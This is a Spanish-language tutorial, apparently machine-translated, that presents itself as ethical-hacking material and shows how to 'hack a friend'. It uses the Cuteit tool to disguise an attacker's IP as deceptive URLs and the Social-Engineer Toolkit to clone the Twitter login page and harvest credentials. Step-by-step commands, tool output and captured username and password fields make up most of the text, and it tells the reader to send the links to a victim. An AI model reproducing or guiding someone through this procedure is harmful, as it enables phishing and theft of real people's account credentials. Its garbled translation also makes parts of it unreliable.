Cómo convertir cualquier dirección IP maliciosa a URL normal y hackear a un amigo

Publicado por: La Redacción - kfiguereo@juventud.gob.do

Los ataques de phishing han sido muy comunes y comunes. En los cursos de hackeo ético del Instituto Internacional de Seguridad Cibernética (IICS) se muestran muchos métodos para realizar ataques de phishing. A continuación, mostraremos una herramienta llamada Cuteit.

Investigadores del curso de ética hacking del IICS mencionan que Cuteit es una herramienta especialmente diseñada para ocultar una IP maliciosa utilizable en pentesting de redes.

Cuteit está diseñado para convertir direcciones IP maliciosas en URL regulares; es un simple script de Python que ayuda al atacante a hacer que la IP no se ve como una IP normal. Para las pruebas, hemos empleado esta herramienta en Kali Linux 2018.4.

  • Para clonar, escriba: git clone https://github.com/D4Vinci/Cuteit.git
root @ kali: / home / iicybersecurity / Downloads # git clone https://github.com/D4Vinci/Cuteit.git
 Clonando en 'Cuteit' ... 
remoto: Enumerando objetos: 17, listo. 
remoto: contando objetos: 100% (17/17), hecho. 
remoto: Compresión de objetos: 100% (12/12), hecho. 
remoto: Total 41 (delta 7), reutilizado 13 (delta 5), ​​paquete reutilizado 24 
Desempaquetado de objetos: 100% (41/41), hecho.
  • Luego teclee cd Cuteit && ls
root @ kali: / home / iicybersecurity / Downloads # cd Cuteit /
 root @ kali: / home / iicybersecurity / Downloads / Cuteit # ls
 Cuteit.py LICENCIA module.png README.md Screenshot1.png Screenshot2.png
  • Escriba python Cuteit.py
root @ kali: / home / iicybersecurity / Downloads / Cuteit # python Cuteit.py
 uso: Cuteit.py [-h] [--disable-coloring] ip 
Cuteit.py: error: muy pocos argumentos
  • Luego escriba python cuteit.py
root @ kali: / home / iicybersecurity / Downloads / Cuteit # python Cuteit.py -h
 uso: Cuteit.py [-h] [--disable-coloring] 

 
argumentos posicionales de 
   ip : ip IP que desea convertir 
 
argumentos opcionales: 
   -h , --ayuda para mostrar este mensaje de ayuda y salir 
   - deshabilitar colorear Deshabilitar la impresión en color
  • Escriba python Cuteit.py 192.168.1.8
  • 192.168.1.8 es su IP local / IP del atacante
root @ kali: / home / iicybersecurity / Downloads / Cuteit # python Cuteit.py 192.168.1.8
 Ofuscador de IP de Cuteit hecho por By Karim 'D4Vinci' Shoair 
Conversión de IP a HEX 
* Utilizando http: //0xc0.168.1.8 formulario 
[0] http: //howsecureismypassword.net@0xc0.168.1.8 
[1] http: //google.com@accounts@0xc0.168.1.8 
[2] https: //www.facebook.com+settings&tab=privacy@0xc0. 168.1.8 

* Using http://0xc0.0xa8.1.8 form         
[0] http://howsecureismypassword.net@0xc0.0xa8.1.8         
[1] http://google.com@accounts@0xc0.0xa8.1.8         
[2] https://www.facebook.com+settings&tab=privacy@0xc0.0xa8.1.8 

* Using http://0xc0.0xa8.0x1.8 form         
[0] http://howsecureismypassword.net@0xc0.0xa8.0x1.8         
[1] http://google.com@accounts@0xc0.0xa8.0x1.8         
[2] https://www.facebook.com+settings&tab=privacy@0xc0.0xa8.0x1.8 

* Using http://0xc0.0xa8.0x1.0x8 form         
[0] http://howsecureismypassword.net@0xc0.0xa8.0x1.0x8         
[1] http://google.com@accounts@0xc0.0xa8.0x1.0x8         
[2]https://www.facebook.com+settings&tab=privacy@0xc0.0xa8.0x1.0x8

* Using http://0x00000000c0.0x000000a8.0x00001.0x008 form         [0] http://howsecureismypassword.net@0x00000000c0.0x000000a8.0x00001.0x008         
[1] http://google.com@accounts@0x00000000c0.0x000000a8.0x00001.0x008         [2] https://www.facebook.com+settings&tab=privacy@0x00000000c0.0x000000a8.0x00001.0x008 

* Using http://0xc0a80108 form         
[0] http://howsecureismypassword.net@0xc0a80108         
[1] http://google.com@accounts@0xc0a80108         
[2] https://www.facebook.com+settings&tab=privacy@0xc0a80108

Conversión de IP a Octal 
* Usando http: //0300.0250.0001.0010 form 
[0] http: //howsecureismypassword.net@0300.0250.0001.0010 
[1] http: //google.com@accounts@0300.0250.0001.0010 
[2] https: //www.facebook.com+settings&tab=privacy@0300.0250.0001.0010 

Convertir IP a largo 
* Usando el formulario http: // 3232235784
[0] http: //howsecureismypassword.net@3232235784 
[1] http: //google.com@accounts@3232235784 
[2] https: //www.facebook.com+settings&tab=privacy@3232235784 

Conversión de IP a IP con código de fuente urinario 
* Uso de http: //% 3192% 2E% 3168% 2E% 31% 2E% 38 formulario 
[0] http: //howsecureismypassword.net@%3192%2E%3168%2E%31%2E%38 
[1] http: //google.com@accounts@%3192%2E%3168%2E%31%2E%38 
[2] https: //www.facebook.com+settings&tab=privacy@%3192%2E%3168%2E%31% 2E% 38
  • Después de ejecutar la consulta anterior, se creará una lista de URL regulares. Ahora puedes enviar estas URL a la víctima
  • También puedes usar estas direcciones para crear una página falsa. Como se explica en la maldición del hacking ético del IICS, podemos usar el kit de herramientas incorporadas en Kali Linux para crear páginas de phishing
  • Abra otra terminal de Linux para crear una página de phishing; teclee sectookit
root @ kali: / home / iicybersecurity # setoolkit 

Seleccione desde el menú: 
1) Ataques de ingeniería social 
    2) Pruebas de penetración (vía rápida) 
    3) Módulos de terceros 
    4) Actualice el kit 
    de herramientas Social-Engineer 5) Actualice la configuración del SET 
    6) Ayuda, créditos y aproximadamente 
99) Salga del kit de herramientas Social-Engineer
  • Teclee 1
Seleccione del menú: 
1) Ataques de ingeniería social 
    2) Pruebas de penetración (Fast-Track) 
    3) Módulos de terceros 
    4) Actualice el kit 
    de herramientas de Social-Engineer 5) Actualice la configuración de SET 
    6) Ayuda, créditos y aproximadamente 
99) Salga de 

Conjunto de herramientas de ingeniería social > 1
  • Teclee 2
Seleccione del menú: 
1) Spear-Phishing Attack Vectors 
    2) Website Attack Vectors 
    3) Infectious Media Generator 
    4) Cree una carga útil y un oyente 
    5) Mass Mailer Attack 
    6) Arduino-Attack Vector 
    7) Wireless Access Point Attack Vector 
    8) QRCode Generator Attack Vector 
    9) Powershell Attack Vectors 
   10) SMS Spoofing Attack Vector 
   11) Módulos de terceros 
99) Vuelva al menú principal. 
set> 2
  • Teclee 5
set: webattack> 5
 El primer método permitirá a SET importar una lista de 
  aplicaciones web predefinidas que puede utilizar dentro del ataque. 
El segundo método clonará completamente un sitio web de su elección 
  y le permitirá utilizar los vectores de ataque dentro de la 
  misma aplicación web que intentaba clonar. 
El tercer método le permite importar su propio sitio web, tenga en cuenta que 
  solo debe tener un index.html cuando use la 
  funcionalidad del sitio web de importación . 
1) Plantillas web 
    2) Clonista del sitio 
    3) Importación personalizada 
99) Volver al menú de Webattack
  • Teclee 2
set: webattack> 2
 
 --- * IMPORTANTE * LEA ESTO ANTES DE INTRODUCIR LA DIRECCIÓN IP * IMPORTANTE * --- 
La forma en que esto funciona es mediante la clonación de un sitio y la búsqueda de campos de formulario para 
volver a escribir. Si los campos POST no son métodos habituales para publicar formularios, esto 
podría fallar. Si lo hace, siempre puede guardar el HTML, reescribir los formularios para que 
sean formularios estándar y usar la función "IMPORTAR". Además, realmente 
importante: 
si está utilizando una DIRECCIÓN IP EXTERNA, debe colocar la 
dirección IP EXTERNA a continuación, no su dirección NAT. Además, si no conoce 
los conceptos básicos de redes y tiene una dirección IP privada, deberá 
realizar el reenvío de puertos a su dirección IP NAT desde su IP externa.
dirección. Un navegador no sabe cómo comunicarse con una 
dirección IP privada , por lo tanto, si no especifica una dirección IP externa si está usando 
esto desde una perspectiva externa, no funcionará. Esto no es un problema de SET, 
así es como funciona la red.
  • Teclee 192.168.1.8
set: webattack> Dirección IP para el POST en Harvester / Tabnabbing [192.168.1.8]: 192.168.1.8
  • Teclee twitter.com/login
set: webattack> Ingrese la url para clonar: twitter.com/login
 [ ] Clonando el sitio web: http://twitter.com/login [ ] Esto podría tardar un poco ... 


La mejor manera de usar este ataque es si el nombre de usuario y 
campos de formulario de contraseña están disponibles. En cualquier caso, esto captura todos los POST en un sitio web. 
[ ] Es posible que necesite copiar / var / www / en / var / www / html dependiendo de dónde se encuentre la estructura de su directorio. 
Oprima {regresar} si entiende lo que estamos diciendo aquí. 
[ ] Web Jacking Attack Vector está habilitado ... La víctima debe hacer clic en el enlace. [ ] El kit de herramientas del ingeniero social Credential Harvester Attack 
[ ] Credential Harvester se está ejecutando en el puerto 80 [] La información se mostrará a usted a medida que llega a continuación:
  • El objetivo abrirá cualquier URL de la lista anterior
  • Vaya al navegador y abra http: //google.com@accounts@0xc0.168.1.8  
  • Al abrir el enlace anterior se abrirá otro enlace. Ese enlace de phishing será utilizado
  • ¿Cómo se ha creado la página de phishing?
192.168.1.2 - - [11 / Feb / 2019 01:54:46] "GET / HTTP / 1.1" 200 - 
intento de recorrido de directorio detectado desde: 192.168.1.2
  • Ahora si el objetivo es el nombre de usuario y contraseña, se encuentra en el terminal de Linux
192.168.1.2 - - [11 / Feb / 2019 01:54:59] "GET /index.html HTTP / 1.1" 404 - 

[ ] ¡TENEMOS UN GOLPE! Impresión del resultado: POSIBLE CAMPO DE USUARIO ENCONTRADO: sesión [username_or_email] = veho43166188 
 POSIBLE CAMPO DE CONTRASEÑA ENCONTRADO: sesión [contraseña] = testpass123 @ 

PARAM: authenticity_token = ccfecb5221b3f2dfca275505ccc3fd824ac1ff2e PARAM: ui_metrics = { "rf": { "a1fc4712673653dc721140c307b3d69bdf1debba19c11a88f047db3675dd013a": - 234, "c74278047b48f1012b45b502858bd8416981f37a62e06d7b1a3b7fb029960145": 99, "ece868d7ddab4e90b3b79cdef3f463c1edb1af8d9043aff0889136eff50b2a7a": - 82, "ae942ff2a53c3475e676e8d6655e26999352ea85d97c4841e2f20cd2b810708d": - 210}, "s": "5sb3j3j2yR5o0- h0Q_ky-89k40N0EuZ7v7g4aEUCr5KyHp3tVmkracFE845oc-23ta2rQScujGno8eT-6iLLoiCiZz4DMKl65Q_cVhMPckCAQ6vdwu-iMWgphwtX5JSVWdLxI9kookHzpv3t22keXhnGrDeT2GLRPqVQBaTY0QO_zEyewzMmwjMIqyYGZWFV666gf94T0-rs4EGp-PhcMw_w23eQ2FEUKEMTaqJOF0u2wjOq4MacNxIoVas_UUPZKoiGqNhN5AWl0YpAXE6G-v6o80sQbZikdSz4062qvAl65WCE6CGDssXmqlDajIy9rpNy4WwNIHO5zxZBOR1wAAAWjbVmnh "} 
PARAM:scribe_log = 
POSIBLE CAMPO DE USUARIO ENCONTRADO: redirect_after_login =
PARAM: authenticity_token = ccfecb5221b3f2dfca275505ccc3fd824ac1ff2e 
PARAM: remember_me = 1 
[ ] CUANDO TERMINE, PULSE CONTROL-C PARA GENERAR UN INFORME.
  • Como puede ver, puede obtener fácilmente el nombre de usuario y la contraseña del objetivo

Si se crean páginas normales de phishing, hay menos posibilidades de que el objetivo abra esa página. Esta herramienta ayuda a convertir direcciones IP maliciosas en URL regulares.

Fuente: Noticias Seguridad